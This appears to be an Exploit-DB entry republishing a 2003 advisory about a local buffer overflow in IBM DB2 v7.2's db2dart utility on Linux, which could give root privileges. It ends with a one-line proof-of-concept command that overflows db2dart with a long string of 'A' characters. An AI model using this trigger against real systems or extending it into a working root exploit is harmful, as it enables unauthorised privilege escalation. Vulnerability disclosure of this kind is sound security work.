IBM DB2 db2dart - Buffer Overflow

EDB-ID:

23112




Platform:

Linux

Date:

2003-09-18


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

source: https://www.securityfocus.com/bid/8552/info

It has been reported that the IBM DB2 db2dart utility is prone to locally exploitable buffer overflow vulnerability. A local attacker, who can authenticate or has access as the db2as user, may exploit this issue to execute arbitrary instructions with elevated privileges. Specifically, user 'root' privileges.

Although this vulnerability has been reported to affect IBM DB2 v7.2 for Linux x86/s390 Other IBM DB2 versions and target platforms may also be affected. 

/home/db2as/sqllib/adm/db2dart `perl -e 'print "A"x1287'`